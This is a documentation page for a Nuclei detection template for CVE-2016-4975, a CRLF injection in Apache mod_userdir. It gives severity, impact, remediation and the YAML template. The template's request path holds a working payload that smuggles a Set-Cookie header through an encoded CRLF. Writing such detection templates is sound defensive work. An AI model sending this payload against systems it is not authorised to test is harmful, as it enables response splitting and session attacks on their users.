Skip to content
Nuclei Templates

Apache mod_userdir CRLF injection

ID: CVE-2016-4975

Severity: medium

Author: melbadry9,nadino,xElkomy

Tags: cve2016,cve,crlf,apache,xss

Description

Section titled “Description”

Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.

YAML Source

Section titled “YAML Source”
id: CVE-2016-4975


info:
  name: Apache mod_userdir CRLF injection
  author: melbadry9,nadino,xElkomy
  severity: medium
  description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
  impact: |
    Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning.
  remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
  reference:
    - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
    - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
    - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E
    - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E
    - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-4975
    cwe-id: CWE-93
    epss-score: 0.00399
    epss-percentile: 0.73471
    cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: http_server
    shodan-query:
      - cpe:"cpe:2.3:a:apache:http_server"
      - apache 2.4.49
  tags: cve2016,cve,crlf,apache,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"


    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
# digest: 490a00463044022062e0c9ef5087e04e229204e54d3e4f9b5214cce6ab19894b24cd301c0283eb82022029790b566f4bbef140912c1743006c9b0b505fa48545d5f2274309b64293be51:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-4975.yaml"

View on Github